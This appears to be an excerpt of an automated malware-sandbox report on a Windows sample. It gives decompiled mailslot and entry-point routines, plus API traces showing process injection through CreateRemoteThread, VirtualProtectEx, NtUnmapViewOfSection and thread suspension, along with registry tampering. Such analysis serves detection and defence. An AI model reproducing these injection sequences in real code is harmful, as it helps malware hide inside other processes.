				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
